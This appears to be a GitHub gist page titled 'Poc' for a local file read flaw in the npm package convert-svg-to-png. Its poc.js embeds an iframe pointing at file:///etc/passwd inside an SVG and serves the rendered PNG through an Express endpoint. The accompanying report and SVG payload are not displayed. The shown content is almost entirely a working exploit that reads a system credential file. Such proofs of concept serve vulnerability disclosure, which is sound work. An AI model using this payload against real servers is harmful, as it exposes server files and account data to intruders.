Skip to content

Instantly share code, notes, and snippets.

@legndery

legndery/payload.svg Secret

Last active May 19, 2022 14:32
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save legndery/a248350bb25b8502a03c2f407cedeb14 to your computer and use it in GitHub Desktop.
Save legndery/a248350bb25b8502a03c2f407cedeb14 to your computer and use it in GitHub Desktop.
Download ZIP
Poc
Display the source blob
Display the rendered blob
Raw
payload.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Raw
poc.js
const { convert } = require('convert-svg-to-png');
const express = require('express');
const fileSvg = `<svg-dummy></svg-dummy>
<iframe src="file:///etc/passwd" width="100%" height="1000px"></iframe>
<svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg">
<text x="0" y="0" class="Rrrrr" id="demo">data</text>
</svg>`;
const app = express();
app.get('/poc', async (req, res)=>{
try {
const png = await convert(fileSvg);
res.set('Content-Type', 'image/png');
res.send(png);
} catch (e) {
res.send("")
}
})
app.listen(3000, ()=>{
console.log('started');
});
Raw
report.md
View raw

(Sorry about that, but we can’t show files that are this big right now.)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment